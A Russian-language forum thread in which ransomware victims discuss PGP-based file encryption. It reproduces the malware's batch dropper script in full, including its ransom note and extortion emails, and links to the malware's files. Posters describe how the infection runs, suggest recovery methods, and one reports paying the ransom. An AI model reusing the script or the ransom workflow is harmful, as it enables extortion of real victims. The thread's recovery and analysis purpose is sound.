Помогите с расшифровкой PGP
Столкнулся с вирусом.
Он зашифровал с помощью PGP файлы.
Остались файлы pubring.pgp; randseed.bin ;
password.asc:
pa.bat:
if exist morjik goto endd
echo morjik>morjik
rem start winsor.exe
soundpass.exe
pgp.exe -ea password.txt asik
chcp 1251
for /F ~%%a in ('Date /t') Do ( for /f %%b in ('Time /t') do echo %%a - %%b>>password.asc)
echo Файлы запакованы в архивы с паролем.>>password.asc
echo Стоимость разархивации 10.000 рублей.>>password.asc
echo Для распаковки файлов пришлите два файла на e-mail: cricketgump@gmail.com >>password.asc
echo - файл который Вы сейчас читаете;>>password.asc
echo - один заархивированный файл небольшого размера;>>password.asc
echo В ответ на Ваше письмо придет оригинальный файл и инструкция по оплате.>>password.asc
echo (Оригинальный файл является подтверждением того, что возможно вернуть все данные в исходное состояние)>>password.asc
echo После оплаты придет пароль на архивы и программа, которая распакует все файлы.>>password.asc
echo Ответ на Ваше письмо придет в течение 24 часов.>>password.asc
echo Если ответ не приходит более 24 часов пришлите два файла на резервную почту: cricketgump@mail2tor.com>>password.asc
moar.exe
goto endd2
:endd
rem start winsor.exe
:endd2
Можно ли как нибудь расшифровать пароль на архивы?
Ссылки
[link1] http://dropmefiles.com/0c727
Пароль — маловероятно. Он зашифрован открытым ключом, закрытая часть которого находится у вымогателя. Чем он там шифровал непосредственно Ваши файлы с помощью этого пароля — вопрос; если какой-нибудь самописной софтиной, то, возможно, в ней есть какая-нибудь уязвимость.
папка с его программой... и с остальными файлами[link1]
вот что смог
какой пароль на архив по ссылке?
Столкнулись с этими же ребятами, тёти из бухгалтерии не глядя запустили вирусню из почты и заархивировали файлы на сетевом диске. Мы разобрались в алгоритме PGP и поняли, что расшифровать не получится. Вытрясли из бухгалтерии 10000 и заплатили, т.к. инфа зашифрована критичная. Чуваки прислали в ответ пароль. Кстати, длина пароля – 64 символа, так что про подбор забудьте. Всё что вы имеете – это сам пароль от архивов в зашифрованном виде (PGP message), который расшифровать могут только злоумышленники, имеющие закрытый ключ. Пароль в процессе заражения генерируется случайным образом, записывается в файл password.txt, потом считывается кодироващиком (moar.exe), который в свою очередь затирает файл с паролем и проходит по всем дискам (в т.ч. сетевым), архивируя файлы. Кстати, у нас вирусня была запущена на двух компах, соответственно получилось два разных пароля. Чуваки прислали нам оба за указанную сумму. И еще: файлы вируса лежат в скрытой папке "C:\wintemp_".
Всегда ржал над этими, как ты правильно сказал, тетками из бухгалтерии. И на УСН и на ОСНО – вполне себе справляется облачный Б-Контур – в остальном же им вообще винда не нужна. Изначально подбирать банк, с клиентом под Linux, к примеру ПСБ и все. 10 000р – легко отделались, малой кровью так сказать. Попросили бы миллион и сидели бы потом все без премий с урезанными окладами, пока этот миллион бы не отбился ибо "шифровальщик был с GPG". Я тебе не про твой лично случай а про бухгалтерию в целом. А то там начинается право выбора "Мне винда привычнее", "А мне 1С удобнее" и тд. Ну или браузеры бы принудительно из под SanBoxIE запускали бы им, хотя в случае винды точно не спасет.
Пароль 123 на архив сорри что забыл сказать
Нельзя ли открыть файл Moar.exe и узнать что да как?
Открыли. Moar.exe читает сгенерированный пароль из файла, удаляет файл с паролем и архивирует пользовательские файлы. Пока процесс архивации идет – пароль можно перехватить с помощью Process Monitor: moar.exe запускает rar.exe для каждого файла с открытым паролем в параметрах запуска. Как только moar.exe закончил свою работу – всё, пароль забыт. Остается только в PGP-зашифрованном виде.
Т.е. если я запущу его еще раз, отслежу пароль, то пароль будет другим на предыдущие задания?
Создались множество архивов....
Пароль действительно имеет длину 64 символа. Но пароль, который удалось получить через процесс эксплорер состоит из цифр и пароль имеет вид такой 4639847246398472463984724639847246398472463984724639847246398472
тупо повторение 8 раз блока в восьми цифр. Осталось найти подборщик.
А файловую систему поковырять не пробовали каким-нибудь testdisk-ом?
Пароль в момент запуска pgp.exe, похоже, лежит на диске в файле password.txt открытым текстом. Если он не затирается, а просто удаляется, то вытащить не должно быть большой проблемой.
Попробую конечно...но мы уже искали другими программами по восстановлению удаленных файлов,безуспешно.не нашлось ни одного password.txt
МИшель, а это нескромно будет попросить у вас его программу для дешифровки?
Эти пароли могут быть одинаковыми?